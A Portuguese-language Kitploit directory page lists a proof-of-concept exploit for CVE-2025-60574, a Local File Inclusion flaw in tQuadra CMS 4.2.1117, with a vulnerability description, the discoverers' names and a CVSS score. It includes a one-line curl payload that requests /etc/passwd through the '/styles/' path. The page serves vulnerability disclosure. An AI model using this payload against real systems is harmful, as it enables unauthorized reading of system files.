Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-60574 — Exploit de prova de conceito para CVE-2025-60574, uma vulnerabilidade de Inclusão de Arquivo Local no tQuadra CMS 4.2.1117, permitindo a recuperação arbitrária de arquivos através de requisições GET manipuladas. | Kitploit
Ferramentas/GitHubGitHub/jacopoaugelli/cve-2025-60574
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubjacopoaugelli/cve-2025-60574

CVE-2025-60574

Exploit de prova de conceito para CVE-2025-60574, uma vulnerabilidade de Inclusão de Arquivo Local no tQuadra CMS 4.2.1117, permitindo a recuperação arbitrária de arquivos através de requisições GET manipuladas.

Ver Repositório
há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Descobridores de Vulnerabilidades e Autores de Exploits

Stefano Andreatta & Jacopo Candido Augelli


CVE-2025-60574

Descrição da Vulnerabilidade

Uma vulnerabilidade de Inclusão Local de Arquivos (LFI) foi identificada no tQuadra CMS 4.2.1117. O problema existe no caminho "/styles/", que não sanitiza adequadamente a entrada fornecida pelo usuário. Um atacante pode explorar isso enviando uma requisição GET maliciosa para recuperar arquivos arbitrários do sistema subjacente.

Descobridores: Stefano Andreatta & Jacopo Candido Augelli

CVSS 3.1 - 7.5 Alta

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Prova de Conceito

root@kitploit:~
curl -s https://vulnerable.site.com/styles//etc/passwd --output - | gunzip

PoC.png

Baixar ferramenta